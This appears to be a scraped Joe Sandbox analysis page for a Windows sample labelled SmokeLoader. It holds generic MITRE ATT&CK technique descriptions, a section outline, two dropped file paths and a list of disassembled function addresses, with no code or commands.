Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: SmokeLoader

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\vhefigi

C:\Users\user\AppData\Roaming\vhefigi:Zone.Identifier

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

Windows Analysis Report
file.exe

Function 00404BB9 Relevance: 98.3, APIs: 49, Strings: 7, Instructions: 289
memorylibrarytimeCOMMON

Function 004046F6 Relevance: 22.9, APIs: 3, Strings: 10, Instructions: 195
librarymemoryloaderCOMMON

Function 0040D47E Relevance: 4.5, APIs: 3, Instructions: 45
COMMON

Function 0040AD36 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Function 004092BD Relevance: 1.5, APIs: 1, Instructions: 4
COMMONLIBRARYCODE

Function 00404BA5 Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Function 004045DF Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 103
fileCOMMON

Function 0040730B Relevance: 7.6, APIs: 5, Instructions: 58
COMMONLIBRARYCODE

Function 0040CAD1 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 004093B2 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57
libraryloaderCOMMONLIBRARYCODE

Function 00404F68 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 80
timeCOMMON

Function 00409CBD Relevance: 9.0, APIs: 6, Instructions: 49
COMMONLIBRARYCODE

Function 00406A18 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34
COMMONLIBRARYCODE

Function 00409A0C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22
COMMON

Function 0040DF13 Relevance: 7.5, APIs: 5, Instructions: 47
COMMONLIBRARYCODE

Function 00406F3B Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Function 0040A06A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42
COMMONLIBRARYCODE

Function 004089D1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38
libraryloaderCOMMONLIBRARYCODE

Function 00415899 Relevance: 6.1, APIs: 4, Instructions: 103
COMMONLIBRARYCODE

Function 0040889C Relevance: 6.0, APIs: 4, Instructions: 49
COMMONLIBRARYCODE

Function 0040E67F Relevance: 6.0, APIs: 4, Instructions: 31
COMMONLIBRARYCODE

Function 004044B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86
COMMON

Function 004044AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85
COMMON

Function 00409DE3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMONLIBRARYCODE

Function 00406401 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28
COMMONLIBRARYCODE

Function 00405A66 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
COMMON

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre